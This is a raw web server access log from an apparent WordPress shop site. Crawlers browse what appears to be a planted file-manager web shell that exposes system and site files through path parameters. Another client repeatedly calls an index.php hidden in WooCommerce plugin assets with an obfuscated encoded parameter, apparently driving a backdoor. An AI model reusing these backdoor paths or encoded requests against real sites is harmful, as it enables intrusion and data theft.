216.73.216.122 - - [02/Aug/2026:01:34:28 +0200] "GET /shops/seance/p0h6e7n0a8c8e3t3i7n9 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:30 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu0/driver HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:31 +0200] "GET /?fileloc=%2F%2Fsbin%2Fiptables-legacy-save&path=%2F%2Fsbin HTTP/1.1" 200 33700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/subsystem/drivers/processor/cpu0/hotplug HTTP/1.1" 200 3256 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/subsystem/drivers/processor/cpu0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:34 +0200] "GET /shops/venerably/o0s8m7i7u5m24867?path=%2F%2Ftmp HTTP/1.1" 200 3212 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:37 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.1" 200 3397 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/subsystem/drivers/processor/cpu0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:37 +0200] "GET /nazaritic/o0d8o8r2a7m6e6n2t55 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:01:34:40 +0200] "GET /elegant/s0u1p1r4a3p8e6d7a7l0 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:40 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3399 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:34:43 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/driver/cpu1/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:43 +0200] "GET /?x=f0o2l7i9u5m3s75392 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:01:32:23 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303734332p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373134332q6565336565306630383434633736376466353066313262646135313237386233222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:34:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:46 +0200] "GET /?x=c0r4o1s9s7b3u8n2199 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu1/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu1/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:50 +0200] "GET /shops/tessellate/w0e4l1l0s9e1e6n3885?path=%2Fvar HTTP/1.1" 200 3544 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu2/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu2/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:53 +0200] "GET /bloody/p0i2e2i7n3g192840?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fhttps-detection.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 4748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:56 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3406 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:56 +0200] "GET /kobus/m0e1t5a9m1o3r4p9h8o3s0er?path=%2F%2Froot HTTP/1.1" 200 2745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:34:59 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu1/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu1/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:34:59 +0200] "GET /?x=m0i3c9r1o1t8o1m8e916 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:01:35:02 +0200] "GET /?x=c0a8t8i6l3i0n6a4r5i1an HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:02 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu1/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:05 +0200] "GET /shops/moniliasis/u0n1t7a0n8g7l2e7619?path=%2F HTTP/1.1" 200 3698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu2/driver/cpu1/subsystem/drivers/processor HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu2/driver/cpu1/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:08 +0200] "GET /slough/mewing/01185940133?path=%2Fvar%2Fwww%2Fsopnonill_st_usr HTTP/1.1" 200 3015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu0/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu0/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:32:47 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303736372p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373136372q3931653734353265653735656362386338336532383164383232616137336232222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:35:11 +0200] "GET /ingraining/erechthites/i0n1g6r8a3i8n5i0n7g14 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3407 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:14 +0200] "GET /?x=p0e1n3n6i4l9e7s9s7n6e7ss HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu1/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:17 +0200] "GET /shops/hympne/e0a1s6y6g4o4i9n6g792 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu2/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3401 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu2/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:20 +0200] "GET /?x=s0t3a4p0h6y1l7i2n3i1d1 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:23 +0200] "GET /?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fclass-wp-user-query.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 12604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:24 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu2/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu2/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:26 +0200] "GET /grandpa/indexation/04035649184?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Ftmp HTTP/1.1" 200 4396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:27 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:29 +0200] "GET /?x=i0n4q5u8i5r3i6e1s24 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:30 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu3/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3401 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu3/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:33:10 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303739302p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373139302q3135633265343862613633643262353131313633323462303836623731333565222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:35:32 +0200] "GET /shops/politician/t0i7l1l0e9d05356 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:35 +0200] "GET /obsignation/h0a4r1d5t0a1c8k3745?path=%2Fvar%2Fwww%2Fsopnonill_st_usr HTTP/1.1" 200 3015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu2/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3401 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu2/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:38 +0200] "GET /?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fclass-wp-network.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 6575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu2/subsystem/drivers/processor/cpu2/hotplug HTTP/1.1" 200 3250 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu2/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:41 +0200] "GET /shops/venerably/o0s8m7i7u5m24867?path=%2F%2Fmnt HTTP/1.1" 200 2744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu3/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu3/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:44 +0200] "GET /shops/cringing/p0h9y0s3i6o1g3n8o8m7monic?path=%2F HTTP/1.1" 200 3698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:47 +0200] "GET /?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-content%2Fthemes%2Ftwentytwentyfour HTTP/1.1" 200 3574 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu1/driver/cpu0/subsystem/drivers/processor/cpu2 HTTP/1.1" 200 3630 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu1/driver/cpu0/subsystem/drivers/processor" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:50 +0200] "GET /?x=o0r3g5a5n1i7s6m1543 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu2/driver/cpu2/subsystem/drivers/processor/cpu1 HTTP/1.1" 200 3624 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu2/driver/cpu2/subsystem/drivers/processor" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:53 +0200] "GET /?x=t0r1i8c4k7i9n1g1874 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:01:33:33 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303831332p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373231332q6636623966336130363233386466306264383566313533663834306233633135222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:35:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:57 +0200] "GET /shops/actaeifolium/k0a8r7a8t7e36966?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 12983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:35:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu3/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3406 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu3/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:35:59 +0200] "GET /shops/abovementioned/c0o2u9n6t4e1r0f1e0i1ting?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata HTTP/1.1" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu2/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu2/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:02 +0200] "GET /?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2FIXR%2F.htaccess&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2FIXR HTTP/1.1" 200 2866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:05 +0200] "GET /shops/moniliasis/u0n1t7a0n8g7l2e7619?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata HTTP/1.1" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu0/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
